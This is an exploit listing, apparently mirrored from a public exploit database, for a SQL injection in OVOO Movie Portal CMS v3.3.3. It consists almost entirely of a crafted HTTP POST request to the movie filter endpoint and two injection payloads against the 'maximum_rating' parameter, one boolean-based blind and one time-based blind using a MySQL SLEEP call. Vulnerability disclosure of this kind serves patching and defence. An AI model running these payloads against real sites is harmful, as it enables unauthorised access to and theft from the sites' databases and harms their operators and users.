Share
## https://sploitus.com/exploit?id=PACKETSTORM:174258
# Exploit Title: OVOO Movie Portal CMS v3.3.3 - SQL Injection  
# Date: 2023-08-12  
# Exploit Author: Ahmet รœmit BAYRAM  
# Vendor: https://codecanyon.net/item/ovoomovie-video-streaming-cms-with-unlimited-tvseries/20180569  
# Tested on: Kali Linux & MacOS  
# CVE: N/A  
  
### Request ###  
POST /filter_movies/1 HTTP/2  
Host: localhost  
Cookie: ci_session=tiic5hcli8v3qkg1chgj0dqpou9495us  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)  
Gecko/20100101 Firefox/116.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/movies.html  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 60  
Origin: htts://localhost  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Te: trailers  
action=fetch_data&minimum_rating=1&maximum_rating=6.8&page=1  
  
### Parameter & Payloads ###  
Parameter: maximum_rating (POST)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND  
2238=2238&page=1  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND (SELECT  
4101 FROM (SELECT(SLEEP(5)))FLwc)&page=1